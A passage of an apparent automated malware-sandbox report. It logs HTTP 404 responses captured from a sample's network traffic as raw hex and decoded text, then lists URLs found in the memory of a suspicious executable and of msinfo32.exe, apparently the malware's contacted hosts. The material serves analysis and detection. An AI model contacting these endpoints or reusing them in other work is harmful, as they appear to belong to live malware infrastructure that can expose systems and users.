6f 72 3a 20 67 72 65 79 3b 20 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 33 3e 45 72 72 6f 72 3a 20 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 33 3e 0d 0a 3c 68 33 3e e6 89 be e4 b8 8d e5 88 b0 e6 82 a8 e8 a6 81 e8 ae bf e9 97 ae e7 9a 84 e9 a1 b5 e9 9d a2 e3 80 82 3c 2f 68 33 3e 0d 0a 0d 0a 3c 70 3e e5 8e 9f e5 9b a0 ef bc 9a e6 89 be e4 b8 8d e5 88 b0 e5 bd 93 e5 89 8d e8 ae bf e9 97 ae e5 9f 9f e5 90 8d e5 af b9 e5 ba 94 e7 9a 84 e7 bd 91 e7 ab 99 ef bc 8c e8 af b7 e8 81 94 e7 b3 bb e7 bd 91 e7 ab 99 e7 ae a1 e7 90 86 e5 91 98 e3 80 82 3c 2f 70 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"/><title>404 not found</title><style>* { font-family: Roboto, system-ui, sans-serif; }h3, p { text-align: center; }p { color: grey; }</style></head><body><h3>Error: 404 Page Not Found</h3><h3></h3><p></p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 02 Aug 2024 11:42:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateVary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: DYNAMICSet-Cookie: _cfuvid=pz3DjthY98aR.Ih6qgCqSWfwbMNl8_ZIAUVGYxVeObw-1722598953281-0.0.1.1-604800000; path=/; domain=.www.baseinvestments.site; HttpOnlyServer: cloudflareCF-RAY: 8acdce20ff6c8c1e-EWRContent-Encoding: gzipData Raw: 34 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a4 56 4d 8f db 36 10 3d 7b 7f c5 44 45 73 28 42 d3 de 6c 8a 42 2b 7b 91 a4 45 1b 20 6d 03 a4 45 d0 d3 82 12 c7 12 b3 14 47 25 29 cb 4e 91 ff 5e 50 a4 bc da 6c d2 22 89 2f b2 86 f3 f5 e6 0d 9f 5d 3c f8 f1 f7 e7 7f fc f5 ea 27 68 7c ab b7 67 45 78 80 16 a6 de 64 68 d8 9f af b3 ed d9 a2 68 50 c8 ed d9 62 51 b4 e8 05 18 d1 e2 26 db 2b 1c 3a b2 3e 83 8a 8c 47 e3 37 d9 a0 a4 6f 36 12 f7 aa 42 36 be 64 1f 46 59 2a c9 bb 59 8c 21 65 24 1e 1e 81 a1 1d 69 4d 43 06 7c 0c f2 ca 6b dc 3e 13 0e e1 85 d9 a3 f3 2d 1a ef 1e c1 cb 97 cf e1 61 2b 85 6b 2e e1 39 b5 ca d4 f0 9a c8 14 3c 06 84 50 57 59 d5 79 70 b6 da 64 8d f7 5d ce 79 29 1c aa db 34 4b a7 3c f2 a1 63 ca 54 ba 97 e8 f8 5b c7 df fe dd a3 3d a6 c7 f2 ad cb b6 05 8f a9 62 56 7f d4 08 fe d8 e1 26 f3 78 f0 bc 72 2e db 7e 07 ff 9c 01 00 94 74 60 4e bd 53 a6 ce a1 24 2b d1 b2 92 0e 97 e3 19 6b e9 1d fb 4f 87 01 cb 1b e5 3f e9 f3 fe ec ac 24 79 9c 4a 89 ea a6 b6 d4 1b c9 2a d2 64 73 18 1a e5 31 a6 4a 96 52 8b ea 26 5a 68 8f 76 a7 69 60 87 1c 1a 25 25 9a 68 6f 85 ad 95 c9 61 35 e6 ff 66 b0 a2 4b 05 84 56 b5 61 ca 63 eb 72 a8 d0 78 b4 31 44 2a d7 69 71 cc 61 a7 31 b5 fe b6 77 5e ed 8e 2c 11 7a d7 bf 55 86 35 a8 ea c6 e7 b0 5e ad f6 cd 58 6a 99 7c 53 b5 90 2b 87 f5 dd a6 44 ef 09 9e 7c 1b 8d 9d 90 72 9c c9 2a be 87 e9 b3 b1 c9 0f ca 89 43 5c bb 1c 2e ce 57 5d 1c dc 8e c8 a3 4d b5 d2 e9 7a b5 9a 52 93 53 5e 91 c9 61 a7 0e 28 2f 13 97 de 53 7b 2a a7 71 e7 a7 31 a5 6c d3 a4 3e d6 49 40 58 7a 73 8f ac 3b a4 cc 38 54 ad a8 31 07 43 06 a7 f2 81 f9 1c d6 dd 01 1c 69 25 ef 04 86 15 69 84 a4 61 1e f2 91 3d e8 ad 0b a6 8e d4 47 f8 53 46 2b 83 ac d4 34 e5 dd 91 f1 61 f7 30 87 f5 45 77 98 19 87 44 e0 c5 6a 9a 47 08 3d d1 ba 7c 32 67 8e 79 ea c2 7c a7 0c 27 ea be ef 0e f0 f8 64 fe 14 83 a3 5d 62 45 56 Data Ascii: 4aaVM6={DEs(BlB+{E mEG%)N^Pl"/]<'h\|gExdhhPbQ&+:>G7o6B6dFYY!e$iMC\|k>-a+k.9<PWYypd]y)4K<cT[=bV&xr.~t`NS$+kO?$yJds1JR&Zhvi`%%hoa5fKVacrx1Diqa1w^,zU5^Xj\|S+D\|rC\.W]MzRS^a(/S{*q1l>I@Xzs;8T1Ci%ia=GSF
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 02 Aug 2024 11:42:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateVary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: DYNAMICSet-Cookie: _cfuvid=WESjX2kzbBtuf5qCrSHkoG4MCXvUAQ.p8iy5XZJFMlI-1722598955857-0.0.1.1-604800000; path=/; domain=.www.baseinvestments.site; HttpOnlyServer: cloudflareCF-RAY: 8acdce314bf3429d-EWRContent-Encoding: gzipData Raw: 34 39 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a4 56 4d 8f db 36 10 3d 7b 7f c5 44 45 73 28 42 d3 de 6c 8a 42 2b 7b 91 a4 45 1b 20 6d 03 a4 45 d0 d3 82 12 c7 12 b3 14 47 25 29 cb 4e 91 ff 5e 50 a4 bc da 6c d2 22 89 2f b2 86 f3 f5 e6 0d 9f 5d 3c f8 f1 f7 e7 7f fc f5 ea 27 68 7c ab b7 67 45 78 80 16 a6 de 64 68 d8 9f af b3 ed d9 a2 68 50 c8 ed d9 62 51 b4 e8 05 18 d1 e2 26 db 2b 1c 3a b2 3e 83 8a 8c 47 e3 37 d9 a0 a4 6f 36 12 f7 aa 42 36 be 64 1f 46 59 2a c9 bb 59 8c 21 65 24 1e 1e 81 a1 1d 69 4d 43 06 7c 0c f2 ca 6b dc 3e 13 0e e1 85 d9 a3 f3 2d 1a ef 1e c1 cb 97 cf e1 61 2b 85 6b 2e e1 39 b5 ca d4 f0 9a c8 14 3c 06 84 50 57 59 d5 79 70 b6 da 64 8d f7 5d ce 79 29 1c aa db 34 4b a7 3c f2 a1 63 ca 54 ba 97 e8 f8 5b c7 df fe dd a3 3d a6 c7 f2 ad cb b6 05 8f a9 62 56 7f d4 08 fe d8 e1 26 f3 78 f0 bc 72 2e db 7e 07 ff 9c 01 00 94 74 60 4e bd 53 a6 ce a1 24 2b d1 b2 92 0e 97 e3 19 6b e9 1d fb 4f 87 01 cb 1b e5 3f e9 f3 fe ec ac 24 79 9c 4a 89 ea a6 b6 d4 1b c9 2a d2 64 73 18 1a e5 31 a6 4a 96 52 8b ea 26 5a 68 8f 76 a7 69 60 87 1c 1a 25 25 9a 68 6f 85 ad 95 c9 61 35 e6 ff 66 b0 a2 4b 05 84 56 b5 61 ca 63 eb 72 a8 d0 78 b4 31 44 2a d7 69 71 cc 61 a7 31 b5 fe b6 77 5e ed 8e 2c 11 7a d7 bf 55 86 35 a8 ea c6 e7 b0 5e ad f6 cd 58 6a 99 7c 53 b5 90 2b 87 f5 dd a6 44 ef 09 9e 7c 1b 8d 9d 90 72 9c c9 2a be 87 e9 b3 b1 c9 0f ca 89 43 5c bb 1c 2e ce 57 5d 1c dc 8e c8 a3 4d b5 d2 e9 7a b5 9a 52 93 53 5e 91 c9 61 a7 0e 28 2f 13 97 de 53 7b 2a a7 71 e7 a7 31 a5 6c d3 a4 3e d6 49 40 58 7a 73 8f ac 3b a4 cc 38 54 ad a8 31 07 43 06 a7 f2 81 f9 1c d6 dd 01 1c 69 25 ef 04 86 15 69 84 a4 61 1e f2 91 3d e8 ad 0b a6 8e d4 47 f8 53 46 2b 83 ac d4 34 e5 dd 91 f1 61 f7 30 87 f5 45 77 98 19 87 44 e0 c5 6a 9a 47 08 3d d1 ba 7c 32 67 8e 79 ea c2 7c a7 0c 27 ea be ef 0e f0 f8 64 fe 14 83 a3 5d 62 45 56 Data Ascii: 49fVM6={DEs(BlB+{E mEG%)N^Pl"/]<'h\|gExdhhPbQ&+:>G7o6B6dFYY!e$iMC\|k>-a+k.9<PWYypd]y)4K<cT[=bV&xr.~t`NS$+kO?$yJds1JR&Zhvi`%%hoa5fKVacrx1Diqa1w^,zU5^Xj\|S+D\|rC\.W]MzRS^a(/S{*q1l>I@Xzs;8T1Ci%ia=GSF
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 02 Aug 2024 11:42:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateVary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: DYNAMICSet-Cookie: _cfuvid=4MfUvizft05ZcYzsPKqgTMqHficOxqAY8tohDyQ02y0-1722598958514-0.0.1.1-604800000; path=/; domain=.www.baseinvestments.site; HttpOnlyServer: cloudflareCF-RAY: 8acdce41f8a77d14-EWRContent-Encoding: gzipData Raw: 34 39 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a4 56 4d 8f db 36 10 3d 7b 7f c5 44 45 73 28 42 d3 de 6c 8a 42 2b 7b 91 a4 45 1b 20 6d 03 a4 45 d0 d3 82 12 c7 12 b3 14 47 25 29 cb 4e 91 ff 5e 50 a4 bc da 6c d2 22 89 2f b2 86 f3 f5 e6 0d 9f 5d 3c f8 f1 f7 e7 7f fc f5 ea 27 68 7c ab b7 67 45 78 80 16 a6 de 64 68 d8 9f af b3 ed d9 a2 68 50 c8 ed d9 62 51 b4 e8 05 18 d1 e2 26 db 2b 1c 3a b2 3e 83 8a 8c 47 e3 37 d9 a0 a4 6f 36 12 f7 aa 42 36 be 64 1f 46 59 2a c9 bb 59 8c 21 65 24 1e 1e 81 a1 1d 69 4d 43 06 7c 0c f2 ca 6b dc 3e 13 0e e1 85 d9 a3 f3 2d 1a ef 1e c1 cb 97 cf e1 61 2b 85 6b 2e e1 39 b5 ca d4 f0 9a c8 14 3c 06 84 50 57 59 d5 79 70 b6 da 64 8d f7 5d ce 79 29 1c aa db 34 4b a7 3c f2 a1 63 ca 54 ba 97 e8 f8 5b c7 df fe dd a3 3d a6 c7 f2 ad cb b6 05 8f a9 62 56 7f d4 08 fe d8 e1 26 f3 78 f0 bc 72 2e db 7e 07 ff 9c 01 00 94 74 60 4e bd 53 a6 ce a1 24 2b d1 b2 92 0e 97 e3 19 6b e9 1d fb 4f 87 01 cb 1b e5 3f e9 f3 fe ec ac 24 79 9c 4a 89 ea a6 b6 d4 1b c9 2a d2 64 73 18 1a e5 31 a6 4a 96 52 8b ea 26 5a 68 8f 76 a7 69 60 87 1c 1a 25 25 9a 68 6f 85 ad 95 c9 61 35 e6 ff 66 b0 a2 4b 05 84 56 b5 61 ca 63 eb 72 a8 d0 78 b4 31 44 2a d7 69 71 cc 61 a7 31 b5 fe b6 77 5e ed 8e 2c 11 7a d7 bf 55 86 35 a8 ea c6 e7 b0 5e ad f6 cd 58 6a 99 7c 53 b5 90 2b 87 f5 dd a6 44 ef 09 9e 7c 1b 8d 9d 90 72 9c c9 2a be 87 e9 b3 b1 c9 0f ca 89 43 5c bb 1c 2e ce 57 5d 1c dc 8e c8 a3 4d b5 d2 e9 7a b5 9a 52 93 53 5e 91 c9 61 a7 0e 28 2f 13 97 de 53 7b 2a a7 71 e7 a7 31 a5 6c d3 a4 3e d6 49 40 58 7a 73 8f ac 3b a4 cc 38 54 ad a8 31 07 43 06 a7 f2 81 f9 1c d6 dd 01 1c 69 25 ef 04 86 15 69 84 a4 61 1e f2 91 3d e8 ad 0b a6 8e d4 47 f8 53 46 2b 83 ac d4 34 e5 dd 91 f1 61 f7 30 87 f5 45 77 98 19 87 44 e0 c5 6a 9a 47 08 3d d1 ba 7c 32 67 8e 79 ea c2 7c a7 0c 27 ea be ef 0e f0 f8 64 fe 14 83 a3 5d 62 45 56 Data Ascii: 49fVM6={DEs(BlB+{E mEG%)N^Pl"/]<'h\|gExdhhPbQ&+:>G7o6B6dFYY!e$iMC\|k>-a+k.9<PWYypd]y)4K<cT[=bV&xr.~t`NS$+kO?$yJds1JR&Zhvi`%%hoa5fKVacrx1Diqa1w^,zU5^Xj\|S+D\|rC\.W]MzRS^a(/S{*q1l>I@Xzs;8T1Ci%ia=GSF
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 02 Aug 2024 11:42:47 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Wed, 07 Sep 2022 18:49:41 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 358Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 52 4b 4f c3 30 0c be ef 57 58 41 93 e0 b0 b6 7b 30 6d 7d 09 21 71 e1 02 37 b8 4d 59 93 b6 5e db 24 4a b2 17 13 ff 9d 74 ad 0a 1c 90 48 a4 c4 ce f7 f9 b3 6c 27 2e 6d 53 a7 a3 b8 e4 94 a5 23 70 2b 36 f6 5c f3 ce 6e 97 57 4b ca b8 86 0b 6c a5 76 46 08 d3 a5 3a 81 91 35 32 b8 c9 e7 ed 8e 7a 6c 62 a5 fa 8d cf 17 eb 15 db 0e b8 a6 0c f7 26 84 fb 60 1c c1 11 99 2d 1d 7d 16 a8 53 04 25 c7 a2 b4 83 4b 05 36 d4 a2 14 21 18 85 02 66 06 6a 14 9c 6a 40 91 a3 40 cb 23 50 d2 60 47 c9 f1 c4 59 04 d7 f4 8b 56 bb e6 b9 ed cd cf a1 94 87 8a 9f 73 4d 1b 6e 3a cd 0b 04 63 77 58 4d 85 c9 a5 6e 42 d0 d2 52 cb 6f 03 c6 8b 3b 17 09 d3 e0 0f c6 7c 39 70 3a fd d8 ff d1 b7 d8 64 1a 95 85 9a 8a 62 4f 0b 9e 90 67 7a a0 dd 23 49 0f ae 88 8d a9 3e 36 ca 75 28 01 b2 7e 7d 79 7c 7a 5f 05 6f 24 72 2a 57 d2 3f 64 c0 e8 2c 21 a5 b5 2a f4 fd 8c 09 6f 67 da b6 78 0c 35 cf 6c 7e 64 5e 26 1b df 54 93 9d 51 54 57 9b 2b a8 4a 45 d2 ef 24 b1 df cd 3d de 4a 76 76 17 c3 03 64 35 35 26 21 dd d4 09 20 4b 88 13 e9 5d 17 eb 38 6d 60 1f e1 77 ff e7 0b 63 0d 17 d5 47 02 00 00 Data Ascii: RKO0WXA{0m}!q7MY^$JtHl'.mS#p+6\nWKlvF:52zlb&`-}S%K6!fjj@@#P`GYVsMn:cwXMnBRo;\|9p:dbOgz#I>6u(~}y\|z_o$rW?d,!ogx5l~d^&TQTW+JE$=Jvvd55&! K]8m`wcG
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 02 Aug 2024 11:42:49 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Wed, 07 Sep 2022 18:49:41 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 358Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 52 4b 4f c3 30 0c be ef 57 58 41 93 e0 b0 b6 7b 30 6d 7d 09 21 71 e1 02 37 b8 4d 59 93 b6 5e db 24 4a b2 17 13 ff 9d 74 ad 0a 1c 90 48 a4 c4 ce f7 f9 b3 6c 27 2e 6d 53 a7 a3 b8 e4 94 a5 23 70 2b 36 f6 5c f3 ce 6e 97 57 4b ca b8 86 0b 6c a5 76 46 08 d3 a5 3a 81 91 35 32 b8 c9 e7 ed 8e 7a 6c 62 a5 fa 8d cf 17 eb 15 db 0e b8 a6 0c f7 26 84 fb 60 1c c1 11 99 2d 1d 7d 16 a8 53 04 25 c7 a2 b4 83 4b 05 36 d4 a2 14 21 18 85 02 66 06 6a 14 9c 6a 40 91 a3 40 cb 23 50 d2 60 47 c9 f1 c4 59 04 d7 f4 8b 56 bb e6 b9 ed cd cf a1 94 87 8a 9f 73 4d 1b 6e 3a cd 0b 04 63 77 58 4d 85 c9 a5 6e 42 d0 d2 52 cb 6f 03 c6 8b 3b 17 09 d3 e0 0f c6 7c 39 70 3a fd d8 ff d1 b7 d8 64 1a 95 85 9a 8a 62 4f 0b 9e 90 67 7a a0 dd 23 49 0f ae 88 8d a9 3e 36 ca 75 28 01 b2 7e 7d 79 7c 7a 5f 05 6f 24 72 2a 57 d2 3f 64 c0 e8 2c 21 a5 b5 2a f4 fd 8c 09 6f 67 da b6 78 0c 35 cf 6c 7e 64 5e 26 1b df 54 93 9d 51 54 57 9b 2b a8 4a 45 d2 ef 24 b1 df cd 3d de 4a 76 76 17 c3 03 64 35 35 26 21 dd d4 09 20 4b 88 13 e9 5d 17 eb 38 6d 60 1f e1 77 ff e7 0b 63 0d 17 d5 47 02 00 00 Data Ascii: RKO0WXA{0m}!q7MY^$JtHl'.mS#p+6\nWKlvF:52zlb&`-}S%K6!fjj@@#P`GYVsMn:cwXMnBRo;\|9p:dbOgz#I>6u(~}y\|z_o$rW?d,!ogx5l~d^&TQTW+JE$=Jvvd55&! K]8m`wcG
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 02 Aug 2024 11:42:52 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Wed, 07 Sep 2022 18:49:41 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 358Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 52 4b 4f c3 30 0c be ef 57 58 41 93 e0 b0 b6 7b 30 6d 7d 09 21 71 e1 02 37 b8 4d 59 93 b6 5e db 24 4a b2 17 13 ff 9d 74 ad 0a 1c 90 48 a4 c4 ce f7 f9 b3 6c 27 2e 6d 53 a7 a3 b8 e4 94 a5 23 70 2b 36 f6 5c f3 ce 6e 97 57 4b ca b8 86 0b 6c a5 76 46 08 d3 a5 3a 81 91 35 32 b8 c9 e7 ed 8e 7a 6c 62 a5 fa 8d cf 17 eb 15 db 0e b8 a6 0c f7 26 84 fb 60 1c c1 11 99 2d 1d 7d 16 a8 53 04 25 c7 a2 b4 83 4b 05 36 d4 a2 14 21 18 85 02 66 06 6a 14 9c 6a 40 91 a3 40 cb 23 50 d2 60 47 c9 f1 c4 59 04 d7 f4 8b 56 bb e6 b9 ed cd cf a1 94 87 8a 9f 73 4d 1b 6e 3a cd 0b 04 63 77 58 4d 85 c9 a5 6e 42 d0 d2 52 cb 6f 03 c6 8b 3b 17 09 d3 e0 0f c6 7c 39 70 3a fd d8 ff d1 b7 d8 64 1a 95 85 9a 8a 62 4f 0b 9e 90 67 7a a0 dd 23 49 0f ae 88 8d a9 3e 36 ca 75 28 01 b2 7e 7d 79 7c 7a 5f 05 6f 24 72 2a 57 d2 3f 64 c0 e8 2c 21 a5 b5 2a f4 fd 8c 09 6f 67 da b6 78 0c 35 cf 6c 7e 64 5e 26 1b df 54 93 9d 51 54 57 9b 2b a8 4a 45 d2 ef 24 b1 df cd 3d de 4a 76 76 17 c3 03 64 35 35 26 21 dd d4 09 20 4b 88 13 e9 5d 17 eb 38 6d 60 1f e1 77 ff e7 0b 63 0d 17 d5 47 02 00 00 Data Ascii: RKO0WXA{0m}!q7MY^$JtHl'.mS#p+6\nWKlvF:52zlb&`-}S%K6!fjj@@#P`GYVsMn:cwXMnBRo;\|9p:dbOgz#I>6u(~}y\|z_o$rW?d,!ogx5l~d^&TQTW+JE$=Jvvd55&! K]8m`wcG
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 02 Aug 2024 11:42:54 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Wed, 07 Sep 2022 18:49:41 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 5f 73 6b 7a 5f 70 69 64 20 3d 20 22 39 50 4f 42 45 58 38 30 57 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 6a 73 69 6e 69 74 2e 64 69 72 65 63 74 66 77 64 2e 63 6f 6d 2f 73 6b 2d 6a 73 70 61 72 6b 5f 69 6e 69 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 69 64 3d 22 73 6b 2d 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 02 Aug 2024 11:42:54 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Wed, 07 Sep 2022 18:49:41 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 5f 73 6b 7a 5f 70 69 64 20 3d 20 22 39 50 4f 42 45 58 38 30 57 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 6a 73 69 6e 69 74 2e 64 69 72 65 63 74 66 77 64 2e 63 6f 6d 2f 73 6b 2d 6a 73 70 61 72 6b 5f 69 6e 69 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 69 64 3d 22 73 6b 2d 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>

Source: wEnggOkwNlJAef.exe, 00000005.00000002.3516176243.0000000005CA0000.00000004.80000000.00040000.00000000.sdmp, msinfo32.exe, 00000006.00000002.3512126162.0000000005FB0000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://baseinvestments.site/1zzj/?AV=_ng4uzR8Zz&SXqH06e=e
Source: wEnggOkwNlJAef.exe, 00000005.00000002.3516176243.0000000005E32000.00000004.80000000.00040000.00000000.sdmp, msinfo32.exe, 00000006.00000002.3512126162.0000000006142000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.php
Source: wEnggOkwNlJAef.exe, 00000005.00000002.3517475959.000000000740C000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.eastcoastev.site
Source: wEnggOkwNlJAef.exe, 00000005.00000002.3517475959.000000000740C000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.eastcoastev.site/51n1/
Source: wEnggOkwNlJAef.exe, 00000005.00000002.3516176243.00000000054C6000.00000004.80000000.00040000.00000000.sdmp, msinfo32.exe, 00000006.00000002.3512126162.00000000057D6000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.hpo0snermcvqv.xyz
Source: msinfo32.exe, 00000006.00000003.2378109254.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: wEnggOkwNlJAef.exe, 00000005.00000002.3516176243.0000000005FC4000.00000004.80000000.00040000.00000000.sdmp, msinfo32.exe, 00000006.00000002.3513710027.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp, msinfo32.exe, 00000006.00000002.3512126162.00000000062D4000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://badges.ausowned.com.au/07634
